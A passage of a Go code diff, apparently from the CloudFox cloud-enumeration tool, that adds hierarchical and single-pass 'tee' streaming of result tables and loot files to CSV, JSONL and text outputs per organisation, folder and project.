pathBuilder("organization", orgID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, orgData, logger); err != nil { + return fmt.Errorf("failed to stream org-level output for %s: %w", orgID, err) + } + } + + // Stream folder-level data (if any) + for folderID, folderData := range outputData.FolderLevelData { + outPath := pathBuilder("folder", folderID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, folderData, logger); err != nil { + return fmt.Errorf("failed to stream folder-level output for %s: %w", folderID, err) + } + } + + // Stream project-level data + for projectID, projectData := range outputData.ProjectLevelData { + outPath := pathBuilder("project", projectID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, projectData, logger); err != nil { + return fmt.Errorf("failed to stream project-level output for %s: %w", projectID, err) + } + } + + return nil +} + +// streamOutputToPath streams CloudfoxOutput data to a specific path +func streamOutputToPath(outPath string, format string, verbosity int, wrap bool, data CloudfoxOutput, logger Logger) error { + if err := os.MkdirAll(outPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // Determine base module name from first table file (for logging) + baseCloudfoxModule := "" + if len(data.TableFiles()) > 0 { + baseCloudfoxModule = data.TableFiles()[0].Name + } + + // Stream table files + for _, t := range data.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + csvFile.Close() + + logger.InfoM(fmt.Sprintf("Output written to %s", csvPath), baseCloudfoxModule) + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + + // Stream table rows + if format == "all" || format == "table" { + tableDir := filepath.Join(outPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + tablePath := filepath.Join(tableDir, safeName+".txt") + + tableFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open table file: %w", err) + } + + // Write tab-delimited data + _, _ = fmt.Fprintln(tableFile, strings.Join(t.Header, "\t")) + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = fmt.Fprintln(tableFile, strings.Join(cleanRow, "\t")) + } + tableFile.Close() + + logger.InfoM(fmt.Sprintf("Output written to %s", tablePath), baseCloudfoxModule) + } + } + + // Stream loot files + for _, l := range data.LootFiles() { + lootDir := filepath.Join(outPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := lootFile.WriteString(scanner.Text() + "\n"); err != nil { + lootFile.Close() + return fmt.Errorf("failed to append loot line: %w", err) + } + } + lootFile.Close() + + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + + return nil +} + +// HandleHierarchicalOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for hierarchical output. +func HandleHierarchicalOutputSmart( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Count total rows across all data + totalRows := 0 + for _, orgData := range outputData.OrgLevelData { + for _, tableFile := range orgData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + for _, folderData := range outputData.FolderLevelData { + for _, tableFile := range folderData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + for _, projectData := range outputData.ProjectLevelData { + for _, tableFile := range projectData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Hierarchical output - Total dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("Large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming hierarchical output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + return HandleHierarchicalOutputStreaming(cloudProvider, format, verbosity, wrap, pathBuilder, outputData) + } + + // Use normal in-memory output for smaller datasets + return HandleHierarchicalOutput(cloudProvider, format, verbosity, wrap, pathBuilder, outputData) +} + +// ============================================================================ +// SINGLE-PASS TEE STREAMING - Efficient hierarchical output with row routing +// ============================================================================ + +// RowRouter is a function that determines which project IDs a row belongs to. +// Given a row (slice of strings), it returns the project IDs that should receive this row. +// The row is always written to org-level; this determines additional project-level routing. +type RowRouter func(row []string) []string + +// ProjectLootCollector is a function that returns loot files for a specific project. +// This allows modules to provide inheritance-aware loot (e.g., org + folder + project loot). +type ProjectLootCollector func(projectID string) []LootFile + +// TeeStreamingConfig holds configuration for single-pass tee streaming output +type TeeStreamingConfig struct { + // OrgID is the organization ID for org-level output + OrgID string + + // ProjectIDs is the list of all project IDs that may receive output + ProjectIDs []string + + // Tables contains the table data to stream (header + body) + Tables []TableFile + + // LootFiles contains loot files to write to org level + LootFiles []LootFile + + // ProjectLootCollector returns loot files for a specific project (with inheritance). + // If nil, no loot is written to project directories. + ProjectLootCollector ProjectLootCollector + + // RowRouter determines which projects each row belongs to + // If nil, rows are only written to org level + RowRouter RowRouter + + // PathBuilder builds output paths for each scope + PathBuilder PathBuilder + + // Format is the output format ("all", "csv", "json", "table") + Format string + + // Verbosity level for console output + Verbosity int + + // Wrap enables table wrapping + Wrap bool +} + +// teeStreamWriter manages multiple output file handles for tee streaming +type teeStreamWriter struct { + // orgWriters holds file writers for org-level output (format -> file) + orgCSV *os.File + orgJSON *os.File + orgTable *os.File + + // projectWriters holds file writers for each project (projectID -> format -> file) + projectCSV map[string]*os.File + projectJSON map[string]*os.File + projectTable map[string]*os.File + + // Track which projects have had headers written + projectHeaderWritten map[string]bool + + // Configuration + format string + outPath string +} + +// HandleHierarchicalOutputTee performs single-pass streaming with tee to multiple outputs. +// This is the most efficient method for large datasets that need both org-level and per-project output. +// +// Instead of streaming org data first, then streaming each project's filtered data separately, +// this function streams through the data once and writes each row to: +// 1. The org-level output (always) +// 2. Any project-level outputs determined by the RowRouter function +// +// This reduces I/O and processing time significantly for large datasets. +func HandleHierarchicalOutputTee(config TeeStreamingConfig) error { + logger := NewLogger() + + if config.OrgID == "" { + return fmt.Errorf("OrgID is required for tee streaming") + } + + // Get base module name for logging + baseCloudfoxModule := "" + if len(config.Tables) > 0 { + baseCloudfoxModule = config.Tables[0].Name + } + + // Build output paths + orgPath := config.PathBuilder("organization", config.OrgID) + projectPaths := make(map[string]string) + for _, projectID := range config.ProjectIDs { + projectPaths[projectID] = config.PathBuilder("project", projectID) + } + + // Track which projects received data (for loot file generation) + projectsWithData := make(map[string]bool) + + // Process each table + for _, t := range config.Tables { + if config.Verbosity > 0 { + tmpClient := TableClient{Wrap: config.Wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + + // Initialize writers + writer := &teeStreamWriter{ + projectCSV: make(map[string]*os.File), + projectJSON: make(map[string]*os.File), + projectTable: make(map[string]*os.File), + projectHeaderWritten: make(map[string]bool), + format: config.Format, + } + + // Open org-level files + if err := writer.openOrgFiles(orgPath, safeName, config.Format); err != nil { + return fmt.Errorf("failed to open org files: %w", err) + } + + // Write org-level headers + if err := writer.writeOrgHeader(t.Header, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write org header: %w", err) + } + + // Pre-open project files if we have a router + if config.RowRouter != nil { + for projectID, projectPath := range projectPaths { + if err := writer.openProjectFiles(projectID, projectPath, safeName, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to open project files for %s: %w", projectID, err) + } + } + } + + // Stream each row + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + + // Always write to org level + if err := writer.writeOrgRow(cleanRow, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write org row: %w", err) + } + + // Route to projects if router is configured + if config.RowRouter != nil { + targetProjects := config.RowRouter(row) + for _, projectID := range targetProjects { + // Track that this project has data + projectsWithData[projectID] = true + + // Write header if this is the first row for this project + if !writer.projectHeaderWritten[projectID] { + if err := writer.writeProjectHeader(projectID, t.Header, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write project header for %s: %w", projectID, err) + } + writer.projectHeaderWritten[projectID] = true + } + + if err := writer.writeProjectRow(projectID, cleanRow, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write project row for %s: %w", projectID, err) + } + } + } + } + + // Close all files + writer.closeAll() + + // Log output paths + if config.Format == "all" || config.Format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "table", safeName+".txt")), baseCloudfoxModule) + } + + // Log project outputs (only for projects that received data) + for projectID := range writer.projectHeaderWritten { + projectPath := projectPaths[projectID] + if config.Format == "all" || config.Format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "table", safeName+".txt")), baseCloudfoxModule) + } + } + } + + // Write loot files to org level + for _, l := range config.LootFiles { + lootDir := filepath.Join(orgPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + if err := os.WriteFile(lootPath, []byte(l.Contents), 0644); err != nil { + return fmt.Errorf("failed to write loot file: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + + // Write per-project loot files (with inheritance) if collector is provided + if config.ProjectLootCollector != nil { + for projectID := range projectsWithData { + projectPath := projectPaths[projectID] + projectLootFiles := config.ProjectLootCollector(projectID) + + for _, l := range projectLootFiles { + lootDir := filepath.Join(projectPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create project loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + if err := os.WriteFile(lootPath, []byte(l.Contents), 0644); err != nil { + return fmt.Errorf("failed to write project loot file: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + } + } + + return nil +} + +// openOrgFiles opens output files for org-level output +func (w *teeStreamWriter) openOrgFiles(orgPath, safeName, format string) error { + var err error + + if format == "all" || format == "csv" { + csvDir := filepath.Join(orgPath, "csv") + if err = os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + w.orgCSV, err = os.OpenFile(filepath.Join(csvDir, safeName+".csv"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "json" { + jsonDir := filepath.Join(orgPath, "json") + if err = os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + w.orgJSON, err = os.OpenFile(filepath.Join(jsonDir, safeName+".jsonl"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "table" { + tableDir := filepath.Join(orgPath, "table") + if err = os.MkdirAll(tableDir, 0o755); err != nil { + return err + } + w.orgTable, err = os.OpenFile(filepath.Join(tableDir, safeName+".txt"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + return nil +} + +// openProjectFiles opens output files for a specific project +func (w *teeStreamWriter) openProjectFiles(projectID, projectPath, safeName, format string) error { + var err error + + if format == "all" || format == "csv" { + csvDir := filepath.Join(projectPath, "csv") + if err = os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + w.projectCSV[projectID], err = os.OpenFile(filepath.Join(csvDir, safeName+".csv"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "json" { + jsonDir := filepath.Join(projectPath, "json") + if err = os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + w.projectJSON[projectID], err = os.OpenFile(filepath.Join(jsonDir, safeName+".jsonl"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "table" { + tableDir := filepath.Join(projectPath, "table") + if err = os.MkdirAll(tableDir, 0o755); err != nil { + return err + } + w.projectTable[projectID], err = os.OpenFile(filepath.Join(tableDir, safeName+".txt"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + return nil +} + +// writeOrgHeader writes header to org-level files +func (w *teeStreamWriter) writeOrgHeader(header []string, format string) error { + if format == "all" || format == "csv" { + if w.orgCSV != nil { + _, err := w.orgCSV.WriteString(strings.Join(header, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if w.orgTable != nil { + _, err := w.orgTable.WriteString(strings.Join(header, "\t") + "\n") + if err != nil { + return err + } + } + } + + // JSON doesn't need a header line (each row is self-contained) + return nil +} + +// writeProjectHeader writes header to project-level files +func (w *teeStreamWriter) writeProjectHeader(projectID string, header []string, format string) error { + if format == "all" || format == "csv" { + if f := w.projectCSV[projectID]; f != nil { + _, err := f.WriteString(strings.Join(header, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if f := w.projectTable[projectID]; f != nil { + _, err := f.WriteString(strings.Join(header, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// writeOrgRow writes a row to org-level files +func (w *teeStreamWriter) writeOrgRow(row []string, format string) error { + if format == "all" || format == "csv" { + if w.orgCSV != nil { + _, err := w.orgCSV.WriteString(strings.Join(row, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "json" { + if w.orgJSON != nil { + jsonBytes, err := json.Marshal(row) + if err != nil { + return err + } + _, err = w.orgJSON.WriteString(string(jsonBytes) + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if w.orgTable != nil { + _, err := w.orgTable.WriteString(strings.Join(row, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// writeProjectRow writes a row to project-level files +func (w *teeStreamWriter) writeProjectRow(projectID string, row []string, format string) error { + if format == "all" || format == "csv" { + if f := w.projectCSV[projectID]; f != nil { + _, err := f.WriteString(strings.Join(row, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "json" { + if f := w.projectJSON[projectID]; f != nil { + jsonBytes, err := json.Marshal(row) + if err != nil { + return err + } + _, err = f.WriteString(string(jsonBytes) + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if f := w.projectTable[projectID]; f != nil { + _, err := f.WriteString(strings.Join(row, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// closeAll closes all open file handles +func (w *teeStreamWriter) closeAll() { + if w.orgCSV != nil { + w.orgCSV.Close() + } + if w.orgJSON != nil { + w.orgJSON.Close() + } + if w.orgTable != nil { + w.orgTable.Close() + } + + for _, f := range w.projectCSV { + if f != nil { + f.Close() + } + } + for _, f := range w.projectJSON { + if f != nil { + f.Close() + } + } + for _, f := range w.projectTable { + if f != nil { + f.Close() + } + } +}